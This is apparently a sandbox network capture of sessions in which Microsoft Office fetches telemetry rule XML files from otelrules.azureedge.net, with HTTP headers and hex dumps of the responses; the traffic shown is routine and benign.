Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49886	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:51 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:51 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:51 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111751Z-1746fd949bdl6zq5hC1EWRf3ws00000000x0000000000fcw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:51 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:51 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:51 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:51 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111751Z-1746fd949bdl6zq5hC1EWRf3ws00000000rg000000006ufy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:51 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:51 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:52 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:51 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111751Z-1746fd949bdxk6n6hC1EWRdr8c00000000y0000000005zr5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:52 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:53 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:53 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:53 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: b15ffdf0-e01e-0051-2acd-4584b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111753Z-1746fd949bddgsvjhC1EWRum2c000000019g00000000865q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:53 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49890	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:53 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:55 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:55 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: eed2a8f6-b01e-0001-60d2-4546e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111753Z-1746fd949bd54zxghC1EWRzre400000001bg0000000068en x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:55 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49891	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:53 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:54 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:53 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 46703850-c01e-002b-03cc-456e00000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111753Z-1746fd949bdfg4slhC1EWR34t000000000xg000000007pse x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:54 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49892	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:53 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:54 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:53 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: a6a36225-101e-000b-71ce-455e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111753Z-1746fd949bdl6zq5hC1EWRf3ws00000000w0000000001yeb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:54 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49893	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:54 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:54 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:54 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 4f5c15a4-401e-0067-28ce-4509c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111754Z-1746fd949bd6ztf6hC1EWRvq2s00000000sg00000000587t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:54 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49895	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:55 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:56 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:56 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 52797c88-801e-00ac-33cb-45fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111756Z-1746fd949bdqpttnhC1EWRe1wg00000000w0000000004fpp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:56 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49896	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:55 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:56 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:56 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 0e3f3dcd-301e-001f-2cd1-45aa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111756Z-1746fd949bddtfvqhC1EWRxbpg000000015g000000000f2h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:56 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49894	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:56 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:56 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:56 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 77ea0a00-001e-0066-6ed3-45561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111756Z-1746fd949bd54zxghC1EWRzre400000001e00000000039z0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:56 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49897	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:56 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:56 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:56 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 8c86af4e-801e-00a3-6fcc-457cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111756Z-1746fd949bdmv56chC1EWRypnn000000019g000000003r8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
